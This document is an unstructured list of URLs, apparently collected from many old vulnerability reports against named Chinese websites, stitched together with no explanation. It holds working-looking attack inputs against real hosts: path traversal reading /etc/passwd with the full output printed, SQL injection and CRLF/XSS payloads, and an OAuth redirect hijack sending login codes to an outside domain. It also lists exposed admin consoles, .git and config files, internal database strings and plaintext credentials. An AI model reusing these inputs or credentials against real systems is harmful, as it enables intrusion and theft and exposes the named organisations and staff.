http://connect.qq.com/widget/shareqq/index.html?url=http://jump.qt.qq.com/php/jump/check_url/?url=http://jieshousid.com/f.php&desc=&title=&summary=&pics=https://mqq-imgcache.gtimg.cn/res/mqq/hongbao/img/message_logo_100.png&flash=&site=&style=201&width=32&height=32 http://w.mail.qq.com/cgi-bin/login?3g_sid=获取到的sid&3g_style=1&fun=from3g http://iufo.ldjt.com.cn http://iufo.ldjt.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../ http://iufo.ldjt.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../IBM/WebSphere/AppServer/web/mbeanDocs http://bbs.18touch.com http://club.jr.jd.com http://passport.18touch.com/findpwd http://passport.18touch.com/4056754 http://passport.18touch.com/4 http://202.120.146.49/tasi/main.asp?lang=gb http://**.**.**.**/bugs/wooyun-2010-0164727 https://**.**.**.**/maoshuai/study_python/blob/6becfa68acdf86bbe32efe8b879e8f3c2e5eab77/sendmail.py http://**.**.**.**/sungovnew/findpwd_next.do http://passport.18touch.com/ http://coehm.pw http://exmail.qq.com http://**.**.**.**/review.do?method=col&rid=39520 http://fax.2office.cn http://pay.cang.com/myhome/msg/msgRead.aspx http://pay.cang.com/myhome/msg/msgLists.aspx http://easternmiles.ceair.com/mpf/#/sign/signin site:dellrsm.com http://register.xiaoniu66.com:1088 http://**.**.**.**/hot.php?type=瀛﹂櫌绯诲垪 http://218.89.135.237:9000/hd/ passwd:shell!@# http://mobile.kuwo.cn/mpage/html5/message/action/messageaction.jsp?flag=1&index=201320&pn=0&rn=20 http://www.yn-jnd.com/ http://**.**.**.**/news.php?SysID=2012011021414516153302 http://www.junlebao.com/1.rar http://www.changan.com.cn/news/cadt/&year=2015 http://tra-b2g.ceair.com/v4/B2G/NoticeDetail.aspx?id=102 http://tools.2345.com/ http://www.jbh.com/ http://xyk.edai.com/xyk/shenqing/card/?cardId=2152, http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html http://**.**.**.**/main/home/index.shtml http://**.**.**.**/m1/login.do http://202.98.11.143:6001/ http://**.**.**.**/ http://**.**.**.** https://vpn.le.com http://**.**.**.**/gps/doif/main.jsp https://**.**.**.** http://www.chinanetwork.com.cn http://gxzyy.91huayi.com/report/publicedList.aspx?displayMode=1&frontForUnit=1&holdYear=1&lowUnitCode=01&principalName=oqsddcfv&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=lewrhkdl&publicBatch=-1&subject2=01&subject3=0101 https://iexam.h3c.com/customize/nwc_user_enterprise/login/login.html https://iexam.h3c.com/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://101.251.251.55:8080/login/index.html http://101.251.251.55:8080/.git/index http://101.251.251.55:8080/.git site:chetuan.com http://oa.chetuan.com/contract/login?data=eyd1c2VyaWQnOidQb2x5MDQxMScsJ3Rva2VuJzonNTcyMmY3OTg3NmJmZWM0YWQ1NGQ5ZWM3NGI3MTUxYjMnfQ== http://124.115.26.74/article?id=128&root=125 http://**.**.**.**/conference.aspx?id=239 cn:8888 url:http://www.taishanpic.com.cn/ebusiness/b2c/member/login.html http://101.231.244.195/tms/loginAction.action http://220.181.168.69/ http://assignment.cctv.com/card/home.jsp http://assignment.cctv.com/desk/ http://youth.hznu.edu.cn/list_all.php?classid=46 http://**.**.**/index.shtml http://**.**.**/uddiexplorer/wooyun.jsp http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202 http://60.255.41.34:8080/dl_HD/ http://my.37.com/api/login.php?callback=jQuery18306346307694952913_1453864220307&action=login&login_account=zhourenfa&password=zhourenfa&ajax=0&remember_me=1&save_state=1<ype=1 fastcgi://127.0.0.1:9000 http://my.37.com/api/login.php?callback=jQuery18306346307694952913_1453864220307&action=login&login_account=zhourenfa&password=zhourenfa&ajax=0&remember_me=1&save_state=1<ype=1 http://www.dota2sp.com/ http://live.bilibili.com/i/operation?month=2016-01-01%2000:00:00 http://ceagent.ceair.com http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/license_201601261734 http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:100:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hw:x:500:500:hw:/home/hw:/bin/bash was7:x:3011:301::/home/was7:/bin/bash rduser:x:2011:201::/home/rduser:/bin/bash itimadmin:x:11014:11014::/home/itimadmin:/bin/bash administrator:x:11016:11016::/home/administrator:/bin/bash etdftp:x:11017:11017::/home/etdftp:/bin/bash ora11g:x:11018:11018::/home/ora11g:/bin/bash yxuser:x:11019:11019::/home/yxuser:/bin/bash wang_yl:x:10001:400::/home/wang_yl:/bin/bash zyjin:x:10002:400::/home/zyjin:/bin/bash zhoujie:x:10003:400::/home/zhoujie:/bin/bash apwang:x:10004:400::/home/apwang:/bin/bash yaohy:x:10005:400::/home/yaohy:/bin/bash huangqin:x:10006:400::/home/huangqin:/bin/bash yongzhou:x:10007:400::/home/yongzhou:/bin/bash yxhuang:x:10008:400::/home/yxhuang:/bin/bash wtliu:x:10009:400::/home/wtliu:/bin/bash zytao:x:10010:400::/home/zytao:/bin/bash cjchen:x:10012:400::/home/cjchen:/bin/bash jjjin:x:10013:400::/home/jjjin:/bin/bash huanglei1:x:10014:400::/home/huanglei1:/bin/bash zhangjinliang:x:10015:400::/home/zhangjinliang:/bin/bash yuegao:x:10016:400::/home/yuegao:/bin/bash observer:x:2013:201::/home/observer:/bin/bash rdsys:x:2015:201::/home/rdsys:/bin/bash http://www.changhongit.com/ http://124.205.58.251/ www.veryeast.cn http://www.veryeast.cn/dpo.asp?syskey=8aa23d80e90edb83&uid=2398089&username=123456&password=123456&ticket=cb5aessVpnvHyNDOuivKyBSETf%2BQYY4hO6u8EQNLfuIqRNZ1HYJNoHxou1cnBPRF2jgRatF%2FY%2FJRBcWyxBkI&CookieDate=1&_=1453867475427 URL:https://www.chinalife.com.cn/online/web/user/reset/resetPassword.jsp http://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271 http://jinmi8.com http://img.jinmi8.com/jmimg/logopic/T.asp;201612701926742.jpg https://www.dnspod.cn/Auth/Login http://218.25.161.204:1080/dlkj_server/ http://218.25.161.204:1080/web-console http://218.25.161.204:1080/jmx-console http://218.25.161.204:1080/invoker/JMXInvokerServlet http://union.mumayi.com/index.php?s=/Data/showdata http://218.25.115.4:8080/ipegasus/tologin.do http://66hl.cn/ http://update.tl.sohu.com/tlbb/loginserver.txt http://**.**.**.**:8090/ http://huan.letao.com/wap/pay/address.aspx?tid=0&form=0&addressid=&aid=130706&cid=130700&pid=130000&uuid1453881206&add=&c=&op=newadd http://office.mingyi.com.cn/ http://office.mingyi.com.cn/txl/ http://interactive.huanqiu.com/.git/ http://www.openfind.com/ http://365webcall.2office.cn/ http://rank.4006666688.com/list/?subcgid=4 http://brand.4006666688.com/brandlist/?blimit=0 http://fax.2office.cn/showPublicImage.do?id=1&number=0 http://mobile.kuwo.cn/mpage/special/showSpecal.jsp?id=1320 http://bm.chinabond.com.cn http://bm.chinabond.com.cn/bm/jsp/updatepassword.esp https://github.com/boubei-com/wanma/blob/1cb81f4d8b003bac8a78880ad29182b3023e2270/note.txt http://www.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://tupian.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://huodong.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://yinyue.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://yule.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://www.kf5.com/resources/index?id=2 http://www.kf5.com/resources/view/id/60/ http://www.kf5.com/resources/index/id/2 http://www.kf5.com/resources/view?id=60/ http://mail.12306.cn/app/mail/entry http://mail.12306.cn http://183.131.151.13:8080/imeeting_webinar_web/ http://183.131.151.13:8080/dmp_sys_web/ http://183.131.151.13:8088/ weixin.autohome.com.cn/WeiXinGame/ShowResult?username=test&guid=60dcaec0-86ac-466f-bfc2-3538738047eb URL:http://gms.csair.com http://gms.csair.com/app http://159.226.100.28:81/ http://kt.changhong.com/product/detail.php?id=10002 http://www.sheny.12306.cn/Dzsw/downLoad/Dzsw201311doc.doc http://medical.neusoft.com/WEB-INF/classes/ http://medical.neusoft.com/WEB-INF/classes/EAS.properties http://medical.neusoft.com/WEB-INF/classes/url.properties http://medical.neusoft.com/yd/new_upload/ http://wskh.avicsec.com/m1/login.do http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://www.piao.com/index.php?app=cashier&order_id=70279&no_user=1 http://www.piao.com/index.php?app=cashier&order_id=1474&no_user=1 http://space.bilibili.com/ http://space.bilibili.com/ajax/fav/getBoxList?mid=4926267 http://202.98.11.144/ http://fs.foton.com.cn/login.do http://fs.foton.com.cn https://api.ffan.com/xadmin/login http://**.**.**/commons/sysuser.do http://116.255.254.185/login.php http://m.yicp.com/news/newslist.php?categoryId=15&pageNo=2 http://58.252.73.136:8000/ActivityStatistics.aspx(慧聪家电城的经营分析系统) http://www.chinanetwork.com.cn http://fax.2office.cn/teamindex.do?flag=showGroupInfo&groupid=4 http://oa.zjgjxt.com/中江国际信托OA使用培训PPT.ppt http://mail.zjgjxt.com/admin/main.php?seessid=f6d205885faf863d8bf1a3ada7ccb62b http://player.youku.com/embed/XMTQ1ODYyODYwNA== http://www.openfind.com/ http://service.chexun.com/ http://m.jiashuangkuaizi.com/activities/pugongying/invite?_=1453984661970 http://m.jiashuangkuaizi.com http://hq.guodu.com/hq/socketHQ.jsp) http://**.**.** http://gongyi.feidee.com/money/ http://gongyi.feidee.com/money/upload/icon/000/016/262/924/1453992768492.jsp jdbc:mysql://10.255.2.171:3088/money_lunch?autoReconnect=true&useUnicode=true&characterEncoding=utf-8 jdbc:oracle:thin:@**.**.**.**:1521:oracrm1 jdbc:oracle:thin:@**.**.**.**:1521:additdb jdbc:oracle:thin:@**.**.**.**:1531:orajf10 http://wooyun.org/bugs/wooyun-2010-0141195 index.php/Public/dologin https://plmyun.joyoung.com http://**.**.**.**/news.asp?SysID=2006122192921144710719 http://kyc.chsnenu.edu.cn/administrators/login.asp http://kyc.chsnenu.edu.cn/kycg.asp http://www.changan.com.cn/commonweal/gaxd/&year=2015 http://www.changan.com.cn/news/zthd/&year=2015 http://www.changan.com.cn/news/mtzs/&year=2015 https://github.com/chenshiyang2015/tools/blob/ce3f14b9356d480218a1a7a126eb790e479d77c2/pysms.py http://web.lmobile.cn/平台 https://gms.gfan.com http://gms.gfan.com:8080/loginAction.do?method=login&password=admin&username=admin com:8080 http://magazine.99ys.com/hdbox.php?id=5285&page=1 https://wt1.guodu.com/trade/index.jsp http://www.sunnyoptical.com/jobs_info.html?t=0&pk=1001A11000000001EFF3 http://mk.2000tuan.com/coupon3.7/view/android/startupad.php http://cence.d1net.com/index.php?m=live&c=index&id=25 http://**.**.**.**/TopMall/WEB-INF/web.xml http://**.**.**.**/.viminfo http://**.**.**.**/nginx154/conf/nginx.conf http://**.**.**.**/apache/conf/httpd.conf http://**.**.**.**/.bash_history http://**.**.**.**/nginx154/logs/access.log http://oa1.hzrobam.com/ http://mail.xunlei.com/extmail/cgi/index.cgi http://iptv.cnpc.com.cn/css_edit/css.php http://iptv.cnpc.com.cn/css_edit/someclass.php http://**.**.**/gameing.phpurl=http%3A%2F%2Fs1.ebogame.yjxy.mlong.cn_ http://**.**.**/codereceive.phpcid=2545_ http://**.**.**/news.phpcontentid=2296_ http://**.**.**/news.phpcontentid=1407 http://**.**.**/caches/configs/database.php http://sglj.ebogame.com/log.txt http://ebo.ebogame.com/log.txt http://www.ebogame.com/log.txt http://crm.isimcere.com:7380/OnDemand/loginAction.action http://edit.buding.cn:8983/solr/ http://dynamic.m.tuniu.com/event/lottery/opeLottery/lotteryAndSendAjax?tel=18605050505&actId=100&mark=jdwxhb&offCode=&type=1&one=1 http://wx.cntv.cn/mp/login.html http://wx.cntv.cn/pannel.html,也是能一窥后台全貌的 http://tc.homelink.com.cn/Academy/AcademyCertificateCourseReg05.aspx https://github.com/xiebaochun/notepad/blob/e5a76c7bd07871737b434a498d5e667da7a4ad0f/qipao_doc http://qipaobbs.91qipao.com/api/app/index_api.php?page='+topic_page svn://120.131.81.217/qipao_bbs svn://120.131.81.217/qipao_shop svn://120.131.81.217/www_neng123_com/trunk svn://120.131.81.217/qipao_tools/trunk http://www.umeng.com/ http://shuangbbs.xingkec.com/forum.php http://shuang.xingkec.com/admin/index.php http://we.onexin.com/?mod=bigdata http://qipaobbs.91qipao.com/forum.php http://adshop.91qipao.com/admin/privilege.php?act=login http://we.onexin.com/?mod=bigdata ip:120.131.81.41 http://meeting.oppo.com/ http://meeting.oppo.com/SaleStat/ http://meeting.wanda.com.cn:18080/Conf/jsp/main/mainAction.do https://oa.weidai.com.cn,两个端口的地方 https://github.com/starkwang/FDU-MailHelper/blob/e7ad516d9ce4349a6865bb1da858a1668a3f30fb/index.js http://m.chinaxinge.com/android/xh_so.asp?keyword=-1 http://58.255.193.196/ http://uc.imbatv.cn http://supplier.ext.jumei.com/index.php?r=site/login&?request_uri=https%3A%2F%2Fv.jumei.com&uid=2939&access_token=db5eb2abab5130f7b86748add4ada19a&language=zh http://app.cheshi.com/substation/ad.php?province=21&city=299&pid=1* htttp://help.chinaxinge.com http://tc.changhong.com/inspection/jc.aspx?type=physicochemistry http://x.kuwo.cn/cgi-bin/test-cgi url:http://211.140.20.69:8080/cx/index.php http://www.bgy.cn/ http://218.104.169.74:8080/ http://testlink.foxitsoftware.cn/firstLogin.php http://101.198.156.146:6001/ http://manage.ikuai8.com/User/findPwd/step/1 http://manage.ikuai8.com/User/findPwd/step/3/token/7d74fbaabcb45be65973600d5d25d13e/encode/rrqJkrN2gKuFm7RhsHt-nw http://manage.ikuai8.com/User/findPwd/step/3/token/7d74fbaabcb45be65973600d5d25d13e/encode/rrqJkrN2gKuFm7RhsHt-nw float:right float:right;clear:both http://dx.ikuai8.com/admin/ htttp://jlb.chinaxinge.com B4F90A5BF8824E23427C93D9FFFA0F8B:FG=1 http://www.gamh.com.cn/gamadmin/ http://www.gamh.com.cn/english/huojiangmulu.asp?Info_Type_Name=Scientific%20Achievement&Info_Type_Code=20 https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a%0d%0a%0d%0a https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%3E https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=al%1B%28Jert%28document.domain%29%3E X-XSS-Protection:0关闭浏览器的XSS过滤,想执行什么的代码发现被拦截了就用M神的方式bypass。 www.mkzhan.com http://www.mkzhan.com/api/vipmag3/1.html http://xssnow.com/F8UN http://xssnow.com/F8UN site:17k.com http://dealer.youxinpai.com https://link.zhihu.com/?target=http://a.zhchbin.xyz http://serverfault.com/questions/520244/referer-is-passed-from-https-to-http-in-some-cases-how https://api.weibo.com/oauth2/authorize?scope=email&state=e9887b485320b0cab80b0d029e92759f&redirect_uri=https%3A%2F%2Fwww.zhihu.com%2Foauth%2Fcallback%2Flogin%2Fsina&response_type=code&client_id=3063806388 http://open.weibo.com/wiki/Oauth2/authorize https://api.weibo.com/oauth2/authorize?scope=email&state=e9887b485320b0cab80b0d029e92759f&redirect_uri=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttp%3A%2F%2Fa.zhchbin.xyz%2Fauth%3F&response_type=code&client_id=3063806388 https://github.com/fengxing888851/data/blob/a3c73ba29f230c29fd177c819b4c861c718ba29a/python/send.py http://www.sxdachang.com:80/voting.zip http://218.94.147.86:81/oceanserver/ http://222.73.243.136/main/index.jsp http://training.changhong.com/ http://www.gvsun.net:6180/property/property/main/main.jsp?url=../housing/searchHousing.jsp http://himilk.mengniu.com.cn/weixin/buyAction!toWeixinPay.action?userId=19212&orderNo=wxf140269ed975a9891454253405&price=2880.0&sendTime1=2016-3-5&code=03187e31c2aeb1d3277722808ffb574Z&state=STATE http://himilk.mengniu.com.cn/weixin/buyAction!toWeixinPay.action?userId=19212&orderNo=wxf140269ed975a9891454253405&price=1.0&sendTime1=2016-3-5&code=03187e31c2aeb1d3277722808ffb574Z&state=STATE http://me.waimai.sankuai.com/washData/list http://navs.map.qq.com/ https://github.com/kdyq007/work/blob/db64c7b909be19423b839182d7b2a14e215aa03a/%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BF%A1%E6%81%AF.txt http://netclass.csu.edu.cn/Video/video/video.aspx?CoursewareID=17 www.jiashuangkuaizi.com www.jiashuangkuaizi.com com:8089 http://crs.bgyhotel.com:8089 http://webpager.renren.com/api/getChatList?lt=15&st=0&type=0&roomId=874460788 http://m.91yao.com/ http://m.91yao.com/Order/ordershow/orderid/4279,发现订单可遍历 https://github.com/zhangxiaocenfoxmail/Python_MySQLd/blob/39edcf37ecd9db38d2b36bff5dcabc3c98b2c256/select.py http://www.changan.com.cn/humanresource/rczp/zpgg/&year=2015 http://www.jiashuangkuaizi.com.cn/Index/join http://**.**.**/ http://**.**.**/bea_wls_internal/wooyun.jsp jdbc:oracle:thin:@10.106.0.13:1521:tclcss http://www.dfsyqc.com/ www.dfsyqc.com http://wh.ougz.com.cn:81/网站用了dede程序 http://webapp.zs91.com/ http://game.kuwo.cn/cgi-bin/test-cgi https://api-cust.ayibang.com/v1/pay/wx/sign https://api-cust.ayibang.com/v1/order/detail?orderID=11291191 https://api-cust.ayibang.com/v1/order/cancel https://api-cust.ayibang.com/v1/order/cancel https://api-cust.ayibang.com/v1/house/delete?houseID=17334752 https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 https://api-cust.ayibang.com/v1/house/delete?houseID=17330512 http://fax.2office.cn/public.do?id=32&num=1 http://www.yonyougov.com:7001 http://ws.shangdu.com/phpmyadmin/ user:root pass:root http://game.shangdu.com/ http://game.shangdu.com/homeimages/autoChangeImages.js/%20\0.php http://game.shangdu.com/homeimages/autoChangeImages.js/a.php http://www.yonyougov.com:8080 jobzpgl.swufe.edu.cn/RCPT/Pub01/ArticleDetail.aspx?ID=1 http://fax.2office.cn/teamindex.do?flag=teamlist&groupname=%B9%BA%CE%EF%27 http://baike.chinaxinge.com/improve.asp?fid=13 http://baike.chinaxinge.com/hotword.asp?fid=1 http://baike.chinaxinge.com/searchlist.asp?keyword=1 http://service.yonyou.com/ http://www.goldmail.cn/learning/list.php?NewsType=jsyd http://www.enkj.com/autosite/modelCreate.aspx?pcmb=g&tpl_domain=http://design-57.view.websiteonline.cn&tpl_id=6151&tpl_pic_big=http://screenshots.websiteonline.cn/screenshots/design-57-b.jpg&tpl_price=99.00 http://images.kumi.cn/include/config.inc.php URL:http://www.muyingzhijia.com/forgetpassword.aspx http://olms.sinopec.com/slmwebapp/ http://219.143.118.51:80/invoker/JMXInvokerServlet index.php/Home/Scene/showSceneDetail?sceneid=1333&userid=nine.twelve@foxmail.com http://ec.sinopec.com/supp/index.shtml com:9001/fileuploadAction.do?method=downLoad&fjmc=.xml&fileType=application/pdf&fjbh=web&fjml=/WEB-INF/ com:9001/fileuploadAction.do?method=downLoad&fjmc=.properties&fileType=application/pdf&fjbh=webservicedb&fjml=/usr/suppregwebapp/DefaultWebApp/WEB-INF/classes/ http://219.143.118.177:9001/logonAction.do http://**.**.**.**/bugs/wooyun-2015-0157346提及的cookie伪造登录成功登录系统,同时发现登录可以任意命令执行。 http://xxxxxxxxxxxx/cgi-bin/snmpManager.cgi?cgimodule=home_page http://app.api.muyingzhijia.com/v1/GetUserIdentity http://**.**.**.**/ file:/E:/exlive/gserver/jboss-5.1.0/ file:/E:/exlive/gserver/jboss-5.1.0/server/ file:/D:/exlive/gserver/jboss-5.1.0/server/ file:/F:/exlive/gserver/jboss-5.1.0/server/ file:/E:/exlive/gserver/jboss-5.1.0/server/ http://yyxy.hznu.edu.cn/news.asp http://**.**.**.**/bugs/wooyun-2013-024919 http://**.**.**.**/bugs/wooyun-2016-0174251 http://ka.cwan.com/extend_tao.php?aid=583440'报错 http://a.cheshi.com/seller/0200/map.php?brandshop=1&city=0&id=0&idstr=1&prov=0 http://www.kfc.com.cn/service/log.txt http://m.muyingzhijia.com/ http://vip.api.muyingzhijia.com/json/reply/QueryMemberAddressRequest http://m.muyingzhijia.com http://www.hecom.cn/selcity.php?add1=268 dicc.ins24.com/ah/policies/1001210072 http://www.guangzh.12306.cn/Dzsw/downLoad/kfczzzbl.pdf http://www.heinz.com.cn/naifen/parenting/c/*.html http://map.hznu.edu.cn/Handler/BusLineSeach.ashx?cmd=GetBusLine&Linenum=-1 http://map.hznu.edu.cn/Handler/LCDWinfo.ashx?cmd=GetAll&MOID=4&X=38143&Y=32888&_=1454165087652 http://webapp.zs91.com/ http://m.chinaxinge.com/android/def_bk.asp?keyword=e http://m.chinaxinge.com/android/bkview.asp?id=4178 http://www.hlslm.cn/ www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor A74E8A8E61040DD87FCB1196C5B665A7:FG=1 www.hlslm.cn http://mba.usst.edu.cn/ActivityInformationDetail.aspx?Class_ID=48&InfoId=941 http://www.dsrwzsb.cn/lookdh.asp?id=814 http://www.dsrwzsb.cn/admin/ http://ad.12306.cn/ http://api.ycpai.com/app_api/message_detail?user_id=4099&page=1&login_code=43cdb559a0598d53a5f111221e8bf600&channel=QD_yyb&version=612 http://www.wx163.cn登录 http://123.138.29.71:8080/manage/login.html http://**.**.**.**/doc/refman/5.5/en/union.html http://**.**.**.**/bugs/wooyun-2016-0170433 http://cps.huatu.com/index.php/home/gourl/?source=htjysy http://cps.huatu.com/index.php/home/gourl/?source=htjysy http://mail.office.feng.com/.svn/pristine/ http://bigdata.feng.com/phpinfo.php http://s.feng.com/phpinfo.php http://61.129.68.58/phpinfo.php http://**.**.**/src.zip http://**.**.**.**/c/industry_news_details.php?itemid=479&page=1 http://www.**.**.**.**/c/corp_news_details.php?itemid=455&page=01 http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01 http://**.**.**.**/s/corp_news_details.php?itemid=455%27&page=01 http://**.**.**.**/bugs/wooyun-2010-0163764 http://traffic.founderbn.com/ http://cc.bnchina.com/admin/admin_login.aspx http://mem.usst.edu.cn/ActivityInformationDetail.aspx?Class_ID=38&InfoId=705 http://120.197.94.202:8080/ http://xiao.zymk.cn/index.php/user/index?userid=5973276 http://**.**.**.**/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://mkdd.zymk.cn/index.php/gonglve/show?id=118 http://**.**.**.**:81/ http://**.**.**.**:81/ http://**.**.**.**:81/ http://**.**.**.**:81/ http://rsc.wh.sdu.edu.cn/login/Personnel.do http://www.cls.edu.cn/search/?action=search&keyword=1 http://zy.dbw.cn/Views/sq/Main/UserLogin.aspx http://www.xsteach.com/course/default/category?cid=102 http://www.openfind.com.tw/taiwan/epaper/elog.php?num=*&title=%E7%B6%93%E9%8A%B7%E5%95%86%E5%B0%88%E5%8D%80&url=http://www.openfind.com.tw/taiwan/partners/partners_overview.htm&userid={email http://www.openfind.com.tw/taiwan/epaper/elog.php?date=*&title=%E6%9C%80%E6%96%B0%E6%B6%88%E6%81%AF%20-%20Openfind%20MailBase%202.8%20%E6%90%9C%E5%B0%8B%E6%95%88%E8%83%BD%E5%86%8D%E9%80%B2%E5%8C%96%20%E6%9C%89%E6%95%88%E6%8F%90%E5%8D%87%E4%BC%81%E6%A5%AD%E8%B3%87%E5%AE%89%E7%B8%BE%E6%95%88&url=http://www.openfind.com.tw/taiwan/newsevents/news_detail.php?news_id=2180&userid={email http://www.openfind.com.tw/taiwan/epaper/elog.php?num={epaper_date}&title=%E7%B6%93%E9%8A%B7%E5%95%86%E5%B0%88%E5%8D%80&url=http://www.openfind.com.tw/taiwan/partners/partners_overview.htm&userid=* http://shop.caixin.com/ http://www.guodu.cc/)主站: http://**.**.**.**/sitesearching.php?sid=49 http://shoubashou.org/2244wwwcom/vvvsss/8888/index.asp http://shoubashou.org/index.php?m=Index&a=login http://222.22.224.142/ http://jyjjyj.e21.cn/e21admin/main.php http://mail.e21.cn/extmail/cgi/env.cgi http://meeting.e21.cn/web.rar http://smtp.e21.cn/extmail/cgi/env.cgi http://ushb.e21.cn/ http://211.152.48.110:99/uploadfile/ http://211.152.48.110:99/bin/ http://211.152.48.110:99/images/ http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml http://m.flyertrip.com/index.php/Admin/Login/login.html http://jsj.hznu.edu.cn/ggjxb/dmtwy/help/?ppp=1 http://jsj.hznu.edu.cn/ggjxb/dmtwy/help/detail.asp?Qid=28 http://jsj.hznu.edu.cn http://vip.nawang.cn/.git/ http://www.12yao.com/user/log.txt http://app.yiwugou.com/login/address/json_update.htm?oaid=182108&uuid=74e272e0d46d75860b264d1ed750b32c http://www.dongfeng-honda.com/ http://www.dongfeng-honda.com/spirior-xrv/index.php http://**.**.**.**/news_detail.php?type=news&na_id=2295 http://bioinformatics.cau.edu.cn/cgi-bin/easygo/showObjects.pl?calledfrom=2&db=go&id=13255 http://xinli.cau.edu.cn http://**.**.**.**/read/993653ea650ebe1eacc2c1b2.html http://服务器 http://**.**.**.**:7001/netrep/login.jsp。 http://**.**.**.**/bugs/wooyun-2015-0161989的后续。在**.**.**.**版本中downloadInterface.OpenURL已经不能被**.**.**.**以外的非特权域网页调用了,但是http://**.**.**.**下的页面仍然可以调用这个API来下载任意文件,并且可以使用downloadInterface.RunDownloadItem运行它。由于**.**.**.**没有强制HTTPS,导致中间人可以将用户的任意明文请求劫持跳转到http://**.**.**.**/,跳转之后再次劫持http://**.**.**.**这个请求,返回http://**.**.**.**/bugs/wooyun-2015-0161989中的利用代码。即可导致执行任意代码。 http://**.**.**.**/bugs/wooyun-2015-0161989中的代码到本地C:\rce.html EXACT:http://**.**.**.**/ http://**.**.**.**/。 http://localhost/Tipask_v2.5_UTF8/tipask/?user/register.html http://member.9978.cn/favorite/del_info/id/1473 http://xxxxxxxxx:7288/devicetype/ http://xxxxxxx:7288/mediaconfig/ http://xxxxxxx:7288/mediastatus/ http://xxxxxxxx:7288/remoteupdate/ http://xxxxxxx:7288/serverlog/ http://xxxxxxx:7288/signalconfig/ http://xxxxxx:7288/signalstatus/ http://xxxxxx:7288/transformserver/ http://xxxxxxxxx:7288/userinfo/ http://oa.zhiyin.cn/employee/admin/login.action?result=4f2deccf84ff704da8b5b29b2f44dd4ecb0cb0405e46bfdd4d6c080ecce83b4baa09d88aef32897f8ba56271e525caeba3aa4008beea1a803ae6670a4e877fffa5e90885d65012c14870d8e8da38db5aefd2da6cda84d925e27dce602f349af9619af93295747de58985f71dbb96dddc6a03ee4f47d7002bddf431d7ae340872 http://r.t.qq.com/cbdata/vist/jumpPage?url=http://XXXXXX.xx http://www.changhong.com.cn/zigongsi.htm http://www.hongxing799.com http://www.hongxing799.com/Products/View.asp?id=424 